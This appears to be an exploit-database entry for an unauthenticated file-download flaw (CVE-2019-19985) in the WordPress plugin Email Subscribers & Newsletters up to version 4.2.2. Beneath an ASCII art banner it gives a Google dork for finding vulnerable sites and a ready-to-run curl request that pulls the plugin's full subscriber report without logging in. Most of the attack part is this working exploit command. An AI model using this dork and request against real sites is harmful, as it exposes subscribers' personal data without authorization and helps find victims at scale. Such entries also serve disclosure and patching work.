WordPress Plugin Email Subscribers & Newsletters 4.2.2 – Unauthenticated File Download
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < = 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985
################################################################################################
# ___ ___ ___ ___ ___ #
# / / / / / ___ #
# /:: /:: /:: /:: : / #
# /:/ /:/: /:/: /:/: : : #
# _:~ /:/ : /:/ : /::~: /:: /::__ #
# / : __/:/__/ :__/:/__/_:__/:/: :__/:/:____/://__/ #
# : : /__: /:/ : / /__:~: /__/:/ /__//:/ / #
# : :__ : /:/ / : :__ : :__/:/ / ::/__/ #
# :/:/ / :/:/ / :/:/ / : /__//__/ :__ #
# ::/ / ::/ / ::/ / :__ /__/ #
# /__/ /__/ /__/ /__/ #
# ___ ___ ___ ___ #
# / / / / #
# /:: /:: /:: /:: #
# EXPLOIT /:/: /:/ /:/: /:/: #
# Email Subscribers & Newsletters <= 4.2.2 /::~: _:~ /::~: /:/ : #
# Unauthenticated File Download /:/: :__/ : __/:/: :__/:/__/ :__ #
# :~: /__: : /__:~: /__: /__/ #
# : :__ : :__ : :__ : #
# : /__/ :/:/ / : /__/ : #
# :__ ::/ / :__ :__ #
# KBAZ /__/ /__/ /__/ /__/ #
# #
# #
################################################################################################
curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
Gloss